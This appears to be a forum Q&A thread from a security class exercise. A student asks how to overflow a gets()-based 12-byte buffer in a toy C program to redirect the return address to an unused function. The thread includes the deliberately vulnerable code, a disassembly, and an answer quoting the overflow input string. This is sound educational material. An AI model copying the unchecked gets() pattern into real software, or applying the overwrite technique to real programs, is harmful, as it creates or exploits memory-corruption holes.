Smashing the Stack

1
votes

So I'm working on an assignment for a security class and the assignment is to use a stack overflow to call the function oopsDidISmashTheStack that is never used it the program.

#include <stdio.h>
#include <stdlib.h>

int oopsDidISmashTheStack(void)
{
    printf("Yup, smashing the stack is fun!\n");
    exit(0);
}

int getUserInput (void)
{
    char buf[12];
    gets(buf);
    return(1);
}

int main(void)
{
    getUserInput ();
    printf("Overflow failed, normal return\n");
    return(1);
}

I understand the concept of that after the buf variable is the sfp and then the return address what I can't figure out is the input that would change the return value to the address 0x080484fc which is where the function is located. I thought that it would require 12 characters to fill the buffer and then I was under the impression that sfp and return where 4 bytes so I trying to fill sfp with another 4 random characters and then use \xfc\x84\x04\x08 to make the return address point to the function.

If anyone is familiar with how the stack memory works and could explain where I'm going wrong that would be great?

1
c++buffer-overflowstack-smash
Can you add the disassembly that you get for getUserInput ?us2012
Dump of assembler code for function _Z12getUserInputv: 0x080484b4 <_Z12getUserInputv+0>: push %ebp 0x080484b5 <_Z12getUserInputv+1>: mov %esp,%ebp 0x080484b7 <_Z12getUserInputv+3>: sub $0x18,%esp 0x080484ba <_Z12getUserInputv+6>: lea 0xfffffff4(%ebp),%eax 0x080484bd <_Z12getUserInputv+9>: mov %eax,(%esp) 0x080484c0 <_Z12getUserInputv+12>: call 0x8048390 <gets@plt> 0x080484c5 <_Z12getUserInputv+17>: mov $0x1,%eax 0x080484ca <_Z12getUserInputv+22>: leave 0x080484cb <_Z12getUserInputv+23>: ret End of assembler dump.Jesse Taylor
Hmmm, that looks okay. Have you stepped through it with gdb or a similar debugger to see whether what is happening agrees with what you expect?us2012
I've tried that and looking at the info frame and I think it is but i'm also not very familiar with the output from it so I could be totally wrong.Jesse Taylor

1 Answers

0
votes

You're pretty much on the right track. I suggest you look at the stack and see if the return address is where you think it is. There might be something else in there. Also double check the endien-ness,

I assume this is your input string?

"012345678901xxxx\xfc\x84\x04\x08"

What is the output of your program, generally if you're close but don't get it quite right the program crashes :)